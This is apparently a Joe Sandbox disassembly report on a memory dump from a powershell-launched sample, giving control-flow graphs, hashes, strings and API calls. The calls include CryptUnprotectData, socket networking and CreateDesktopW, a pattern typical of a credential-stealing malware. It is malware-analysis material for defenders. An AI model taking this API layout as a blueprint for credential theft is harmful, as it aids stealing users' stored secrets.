                                                                                                                                                                                                                                                        • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 100 423860-4238af 101 4238b0-4238ed 100->101 101->101 102 4238ef-423936 101->102 104 423940-423968 102->104 104->104 105 42396a-423975 104->105 106 4239d2-4239da 105->106 107 4239b4 105->107 108 423ae4-423af0 105->108 109 423ad4-423adb 105->109 110 4239c5-4239d1 105->110 111 423cb5-423d5b 105->111 112 423c9a 105->112 113 423c88-423c92 105->113 114 42397c-423981 105->114 115 4239bc-4239c2 call 408030 105->115 118 4239e3 106->118 119 4239dc-4239e1 106->119 107->115 120 423af2-423af7 108->120 121 423af9 108->121 109->108 116 423d60-423da9 111->116 113->112 122 423983-423988 114->122 123 42398a 114->123 115->110 116->116 124 423dab-423dba call 4218a0 116->124 126 4239ea-423a22 call 408020 118->126 119->126 127 423b00-423ba8 call 408020 120->127 121->127 128 42398d-4239ad call 408020 122->128 123->128 133 423dbf-423dc2 124->133 138 423a30-423a5e 126->138 137 423bb0-423bff 127->137 128->106 128->107 128->108 128->109 128->110 128->111 128->112 128->113 128->115 141 423dca-423def 133->141 137->137 139 423c01-423c0d 137->139 138->138 142 423a60-423a68 138->142 145 423c31-423c3e 139->145 146 423c0f-423c16 139->146 147 423df0-423e0c 141->147 143 423a81-423a8e 142->143 144 423a6a-423a6f 142->144 149 423a90-423a94 143->149 150 423ab1-423abc call 43e510 143->150 148 423a70-423a7f 144->148 152 423c40-423c44 145->152 153 423c61-423c81 GetLogicalDrives call 43e510 145->153 151 423c20-423c2f 146->151 147->147 154 423e0e-423e91 147->154 148->143 148->148 155 423aa0-423aaf 149->155 160 423ac1-423acd 150->160 151->145 151->151 157 423c50-423c5f 152->157 153->110 153->112 153->113 153->115 153->141 163 423ca0-423ca6 call 408030 153->163 164 423f05-423f0e call 408030 153->164 165 423eff 153->165 166 423caf 153->166 159 423ea0-423ece 154->159 155->150 155->155 157->153 157->157 159->159 162 423ed0-423ef5 call 421740 159->162 160->108 160->109 160->111 160->112 160->113 160->141 160->163 162->165 163->166 165->164 166->111
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                                                                                                                                                                                                        • API String ID: 0-1763234448
                                                                                                                                                                                                                                                        • Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                                                                                                                                                                        • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 173 415799-4157cc call 408030 call 43e6e0 178 415850 173->178 179 4157d3-415800 call 408020 call 43e7d0 173->179 180 415852-415869 173->180 181 415842-415847 173->181 182 415807 173->182 183 415839-41583f call 408030 173->183 184 415818-41582c call 401000 173->184 178->180 179->178 179->180 179->181 179->182 179->183 179->184 187 415870-4158cb 180->187 181->178 182->184 183->181 184->183 187->187 191 4158cd-4158d5 187->191 194 4158d7-4158e6 191->194 195 41591a-41597b call 401a90 191->195 198 4158f0-4158f7 194->198 202 415980-4159b4 195->202 200 415900-415906 198->200 201 4158f9-4158fc 198->201 200->195 204 415908-415917 call 43c1f0 200->204 201->198 203 4158fe 201->203 202->202 205 4159b6-4159d3 call 401dd0 202->205 203->195 204->195 210 415d60 205->210 211 415bc6-415bcb 205->211 212 415d46-415d5f call 43dbf0 205->212 213 415d66 205->213 214 415d7a-415ddf 205->214 215 4159da-4159df 205->215 216 415d3d-415d43 call 408030 205->216 217 415d6c-415d78 call 408030 205->217 219 415bd0-415bd9 211->219 212->210 220 415de0-415dfa 214->220 221 4159e0-4159e6 215->221 216->212 217->214 219->219 225 415bdb-415be2 219->225 220->220 226 415dfc-415e16 call 401dd0 220->226 221->221 227 4159e8-415a07 221->227 230 415be4-415be9 225->230 231 415c06 225->231 226->210 226->211 226->212 226->213 226->214 226->216 226->217 233 415a09-415a0c 227->233 234 415a0e 227->234 236 415c09-415c4b call 408020 230->236 231->236 233->234 238 415a0f-415a28 233->238 234->238 245 415c50-415cb6 236->245 240 415a2a-415a2d 238->240 241 415a2f 238->241 240->241 243 415a30-415a4e call 408020 240->243 241->243 250 415a54-415a5b 243->250 251 415b59-415bbf call 43dbf0 CryptUnprotectData 243->251 245->245 247 415cb8-415cc7 245->247 248 415ce1-415cf8 247->248 249 415cc9-415ccf 247->249 253 415d21-415d37 call 408cb0 248->253 254 415cfa-415d01 248->254 252 415cd0-415cdf 249->252 255 415a80-415aca call 41dae0 * 2 250->255 251->210 251->211 251->212 251->213 251->214 251->216 251->217 252->248 252->252 253->216 257 415d10-415d1f 254->257 265 415a70-415a7a 255->265 266 415acc-415ae7 call 41dae0 255->266 257->253 257->257 265->251 265->255 266->265 269 415ae9-415b11 266->269 270 415a61-415a65 269->270 271 415b17-415b2d call 41dae0 269->271 270->265 274 415b33-415b54 271->274 275 415a5d 271->275 274->265 275->270
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                        • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                                                                                                                                                                                                                        • API String ID: 834300711-3328159043
                                                                                                                                                                                                                                                        • Opcode ID: 6aebcbfd9c355da98518a936545505709d3db2e328049cf977e2e71255f2f4eb
                                                                                                                                                                                                                                                        • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6aebcbfd9c355da98518a936545505709d3db2e328049cf977e2e71255f2f4eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 276 41e7c0-41e85c call 43dbf0 getaddrinfo 279 41e86c-41e8b6 call 43dbf0 * 3 276->279 280 41e85e-41e861 276->280 296 41e8b8-41e8bc 279->296 297 41e8fc-41e91c call 43dbf0 279->297 281 41e922-41e92f 280->281 282 41e867 280->282 286 41e930-41e938 281->286 284 41ecd3-41ecd5 282->284 287 41ef35-41ef3f 284->287 286->286 289 41e93a-41e93f 286->289 291 41e940-41e948 289->291 291->291 293 41e94a-41e94e 291->293 295 41e950-41e957 293->295 295->295 298 41e959-41e998 call 408020 295->298 300 41e8c7-41e8dd socket 296->300 297->281 297->284 306 41e9a0-41e9b4 298->306 303 41e8c0-41e8c5 300->303 304 41e8df-41e8ec 300->304 303->297 303->300 304->297 311 41e8ee-41e8fa 304->311 306->306 307 41e9b6-41e9c5 306->307 310 41e9d0-41e9ff 307->310 310->310 312 41ea01-41ea0b 310->312 311->303 314 41ea0d-41ea14 312->314 315 41ea2c-41ea35 312->315 316 41ea20-41ea2a 314->316 317 41ea37-41ea38 315->317 318 41ea4c-41ea57 315->318 316->315 316->316 319 41ea40-41ea4a 317->319 320 41ea59-41ea5f 318->320 321 41ea6c-41ea75 318->321 319->318 319->319 322 41ea60-41ea6a 320->322 323 41ea77-41ea78 321->323 324 41ea8c-41eb9f 321->324 322->321 322->322 326 41ea80-41ea8a 323->326 325 41eba0-41ebc4 324->325 325->325 327 41ebc6-41ebcc 325->327 326->324 326->326 328 41ebdc-41ebe7 327->328 329 41ebce-41ebcf 327->329 331 41ebe9-41ebef 328->331 332 41ebfc-41ec29 call 43dbf0 328->332 330 41ebd0-41ebda 329->330 330->328 330->330 333 41ebf0-41ebfa 331->333 337 41ec78-41ec86 call 408030 332->337 338 41ec2b-41ec2e 332->338 333->332 333->333 337->284 343 41ec88-41ecb4 call 408020 call 41f180 337->343 338->337 340 41ec30-41ec73 call 43dbf0 * 2 call 408030 338->340 340->287 352 41ef14 343->352 353 41ecba-41ecca 343->353 356 41ef1b-41ef21 352->356 354 41ecda-41ece6 353->354 355 41eccc-41ecce 353->355 361 41ece8 354->361 362 41ecea-41ecfc call 408020 354->362 358 41ee17-41ee47 355->358 359 41ef23-41ef27 356->359 360 41ef32 356->360 367 41ee50-41ee64 358->367 359->360 364 41ef29-41ef2f call 408030 359->364 360->287 361->362 372 41ee03-41ee13 362->372 373 41ed02-41ed0c 362->373 364->360 367->367 370 41ee66-41ee6f 367->370 374 41ee71-41ee79 370->374 375 41eea2-41eea4 370->375 372->358 378 41ed12-41ed14 373->378 379 41edae-41eddf 373->379 380 41ee87-41ee8b 374->380 376 41ef54-41ef58 375->376 377 41eeaa-41eeb1 375->377 385 41ef75-41ef85 call 41f180 376->385 386 41ef5a-41ef71 376->386 377->352 383 41eeb3-41eedc call 41dc00 377->383 378->379 384 41ed1a-41ed1c 378->384 381 41ede1-41edec 379->381 382 41edef-41edff call 408030 379->382 380->377 387 41ee8d-41ee94 380->387 381->382 382->372 383->352 402 41eede-41ef0e call 43dbf0 * 2 383->402 384->382 392 41ed22-41ed36 384->392 385->352 404 41ef87-41ef9a 385->404 386->385 388 41ee96-41ee98 387->388 389 41ee9a 387->389 388->389 394 41ee80-41ee85 389->394 395 41ee9c-41eea0 389->395 398 41ed50-41ed55 392->398 399 41ed38-41ed3a 392->399 394->375 394->380 395->394 398->382 401 41ed5b-41ed5d 398->401 403 41ed3c-41ed46 399->403 407 41ed5f-41edaa 401->407 402->352 403->403 409 41ed48-41ed4c 403->409 405 41efb0-41efbc 404->405 406 41ef9c-41ef9e 404->406 411 41efc0-41efd3 call 408020 405->411 412 41efbe 405->412 410 41f109-41f12f 406->410 407->407 413 41edac 407->413 409->398 416 41f130-41f159 410->416 420 41f0f4-41f105 411->420 421 41efd9-41efe3 411->421 412->411 413->382 416->416 418 41f15b-41f15f 416->418 422 41f160-41f16b 418->422 420->410 424 41efe9-41efeb 421->424 425 41f09f-41f0d0 421->425 426 41f171-41f174 422->426 427 41ef50-41ef52 422->427 424->425 431 41eff1-41eff3 424->431 429 41f0e0-41f0f0 call 408030 425->429 430 41f0d2-41f0dd 425->430 426->422 432 41f176 426->432 427->356 427->376 429->420 430->429 431->429 435 41eff9-41f00d 431->435 432->427 437 41f034-41f039 435->437 438 41f00f-41f013 435->438 437->429 440 41f03f-41f043 437->440 439 41f020-41f02a 438->439 439->439 441 41f02c-41f030 439->441 442 41f050-41f09b 440->442 441->437 442->442 443 41f09d 442->443 443->429
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: getaddrinfosocket
                                                                                                                                                                                                                                                        • String ID: "$-+$/$hI
                                                                                                                                                                                                                                                        • API String ID: 1630306000-2772680581
                                                                                                                                                                                                                                                        • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                                                                                                                                                                        • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 557 408850-408861 call 43bc60 560 408867-40888f call 408020 557->560 561 408acf-408ad1 ExitProcess 557->561 564 408890-4088cb 560->564 565 408904-408916 call 4354e0 564->565 566 4088cd-408902 564->566 569 408ab8-408abf 565->569 570 40891c-40893f GetCurrentProcessId GetCurrentThreadId 565->570 566->564 571 408ac1-408ac7 call 408030 569->571 572 408aca call 43c160 569->572 573 408941-408943 570->573 574 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 570->574 571->572 572->561 573->574 577 408a6b-408aac call 409b00 574->577 578 408a3d-408a69 574->578 577->569 582 408aae call 40c550 577->582 578->577 584 408ab3 call 40b390 582->584 584->569
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00408A33
                                                                                                                                                                                                                                                          • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                                                                                                                                          • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                                                                                                                                                                                                          • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3072701918-0
                                                                                                                                                                                                                                                        • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                                                                                                                                        • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 586 41b2e0-41b318 587 41b320-41b376 586->587 587->587 588 41b378-41b384 587->588 589 41b3a1-41b612 call 408790 * 10 call 43dbf0 CreateDesktopW 588->589 590 41b386-41b38f 588->590 591 41b390-41b39f 590->591 591->589 591->591
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateDesktopW.USER32(?,00000000,00000000,00000000,000F00C7,00000000), ref: 0041B605
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDesktop
                                                                                                                                                                                                                                                        • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                        • API String ID: 3054513912-1379640984
                                                                                                                                                                                                                                                        • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                        • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 0 431715-43174b 1 43174d-431750 0->1 2 431793-431901 SysAllocString 1->2 3 431752-431791 1->3 4 431903-431906 2->4 3->1 5 431908-43193c 4->5 6 43193e-431980 4->6 5->4 8 43198a-4319c2 6->8
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                        • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                        • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 888 430758-43089a SysAllocString 889 43089c-43089f 888->889 890 4308a1-4308c6 889->890 891 4308c8-43090a 889->891 890->889 893 430914-43093a 891->893
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 2525500382-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: 3105f6317aa136daeee14573320fe7428ce014bf8f2ecab488f271abe27fc21a
                                                                                                                                                                                                                                                        • Instruction ID: a094da954053901be58a768e712714aa916a7f14eaab1c75cde4f4bd701cd36d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3105f6317aa136daeee14573320fe7428ce014bf8f2ecab488f271abe27fc21a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A571B260008BD28EC366CB3D89589057FA16B6B230B4A87D8E0FA4F7F7D265D506C766
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 00436165
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 95929093-0
                                                                                                                                                                                                                                                        • Opcode ID: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
                                                                                                                                                                                                                                                        • Instruction ID: 741c48333e69648009e785c6466c575ff7d71c05fd411e4f0ced63eefbf4b49a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86115B32D052968FDB14CB3C8C502ADBFB15F8A320F1983EDD8A5A33D5D9304E428B51
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2020703349-0
                                                                                                                                                                                                                                                        • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                        • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                                                                                                                                                                                        • Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,0000000C,00000000,00000000,?,?), ref: 00417DDE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                        • Opcode ID: d5bd0d86c2a207b0b25f3335c198856b000c34ecc3d354c5810022b6b042cf7e
                                                                                                                                                                                                                                                        • Instruction ID: 7cde67ad982e33068fceebcb4fdb90b5309e7722f8b5e7463ff5f8efe878fa2b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5bd0d86c2a207b0b25f3335c198856b000c34ecc3d354c5810022b6b042cf7e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DE08671255301BFF7249F20EC13F6B7695BB45705F10053DB355A40E0E77165158609
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                        • Opcode ID: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
                                                                                                                                                                                                                                                        • Instruction ID: 88ab58616cf1dac6cba617d780c76543ffdeb80aa514c7c7d0db7b6f6353d972
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FF09EB8509342CFD394DF64C5A875BBBE0EB89348F01891CE4998B391DBB59548CF82
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                        • String ID:
